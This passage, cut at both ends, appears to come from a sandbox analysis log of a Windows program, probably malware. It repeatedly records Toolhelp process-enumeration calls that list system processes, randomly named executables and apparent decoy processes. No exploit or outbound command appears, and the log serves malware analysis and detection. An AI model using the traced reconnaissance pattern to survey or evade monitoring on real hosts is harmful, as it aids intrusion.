cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.143] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0128.144] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0128.145] CloseHandle (hObject=0xbc) returned 1 [0128.145] Sleep (dwMilliseconds=0x12c) [0128.466] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0128.472] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.473] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.474] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.475] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.476] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.477] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.478] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.479] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.480] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.481] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.482] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.483] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.484] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.485] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.486] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.487] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0128.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0128.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0128.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0128.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0128.504] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0128.553] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0128.555] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0128.556] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0128.558] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0128.559] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0128.560] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0128.561] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0128.562] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0128.564] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0128.565] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0128.566] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0128.568] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0128.569] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0128.570] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0128.572] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.573] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0128.574] CloseHandle (hObject=0xc4) returned 1 [0128.574] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0128.582] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.583] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0128.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0128.584] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.585] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0128.586] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0128.587] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0128.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0128.588] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0128.589] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0128.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.590] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.591] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.592] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.593] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0128.594] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.595] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.596] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0128.597] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.599] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.658] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0128.659] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0128.660] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0128.662] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0128.663] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0128.665] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0128.666] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0128.668] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0128.669] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0128.671] Process32NextW (in: hSnapshot=0xbc, 